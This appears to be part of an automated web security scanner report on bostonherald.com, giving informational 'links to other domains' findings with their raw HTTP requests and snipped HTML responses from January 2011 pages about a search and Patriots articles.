<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.299. http://www.bostonherald.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/search/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/search/?topic=scholz&searchSite=recent&x=0&y=0

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3Dscholz%26searchSite%3Drecent%26x%3D0%26y%3D0&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/search/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://tinyurl.com/24azdh8
http://tinyurl.com/32m5o2e
http://tinyurl.com/385v42j
http://tinyurl.com/38kak56
http://tinyurl.com/3xp9usp
http://tinyurl.com/3xyku7b
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /search/?topic=scholz&searchSite=recent&x=0&y=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:06:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 33100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

<link rel="alternate" title="Site Search - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/search/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3Dscholz%26searchSite%3Drecent%26x%3D0%26y%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div><a href="http://tinyurl.com/385v42j">Scholz v. Barry Goudreau (PDF)</a>
...[SNIP]...
<div><a href="http://tinyurl.com/3xyku7b">Scholz v. Anthony Cosmo (PDF)</a>
...[SNIP]...
<div><a href="http://tinyurl.com/32m5o2e">Scholz v. Micki Delp, Connie Goudreau and Jane Doe (PDF)</a>
...[SNIP]...
<div><a href="http://tinyurl.com/38kak56">Scholz v. Gouldsmith (PDF)</a>
...[SNIP]...
<div><a href="http://tinyurl.com/3xp9usp">Scholz v. a female acquaintance (PDF)</a>
...[SNIP]...
<div><a href="http://tinyurl.com/24azdh8">Herald.s Motion to Transfer, including Micki Delp deposition (PDF)</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.300. http://www.bostonherald.com/sports/football/patriots/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/football/patriots/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/sports/football/patriots/view.bg?articleid=1312522&srvc=home&position=active

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview.bg%3Farticleid%3D1312522%26srvc%3Dsports%26position%3D2&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/karen_guregian.gif?1=1
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/sports/football/patriots/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110128/c68b4a_brand_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/6666ca_tom_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/83f74d_bc_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/85bc2c_bill_01282011.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/team.aspx?id=077
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/080/team.aspx?id=080
http://twitter.com/bostonherald
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /sports/football/patriots/view.bg?articleid=1312522&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:53:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 48285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview.bg%3Farticleid%3D1312522%26srvc%3Dsports%26position%3D2&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Brandon Meriweather won’t be bothered by naysayers');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/team.aspx?id=077" >team stats</a>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/080/team.aspx?id=080" >team stats</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312522&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(24) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/c68b4a_brand_01282011.jpg" alt="
PROVING HE BELONGS: Some maligned..." /></div>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128belichick_marks_pats_milestone/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/85bc2c_bill_01282011.jpg" alt="Bill Belichick marks Patriots’ milestone" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128castonzo_follows_lead_blockers/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/83f74d_bc_01282011.jpg" alt="Anthony Castonzo follows lead blockers" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128shadowy_observations_pats_gm_caserio_is_mystery_man/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/6666ca_tom_01282011.jpg" alt="Nick Caserio is a Patriots mystery man" /></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.301. http://www.bostonherald.com/sports/football/patriots/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/football/patriots/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/sports/football/patriots/view.bg?articleid=1312690&pos=breaking

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview%2F20110128mankins_believes_pats_days_are_over%2Fsrvc%3Dhome%26position%3D0&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/karen_guregian.gif?1=1
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/sports/football/patriots/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110126/stp/52e6d1_makn.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/666107_Belichick_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/733e81_Mankins_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/playeraaa.aspx?id=5019,team=077
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/team.aspx?id=077
http://twitter.com/bostonherald
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /sports/football/patriots/view.bg?articleid=1312690&pos=breaking HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:53:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview%2F20110128mankins_believes_pats_days_are_over%2Fsrvc%3Dhome%26position%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
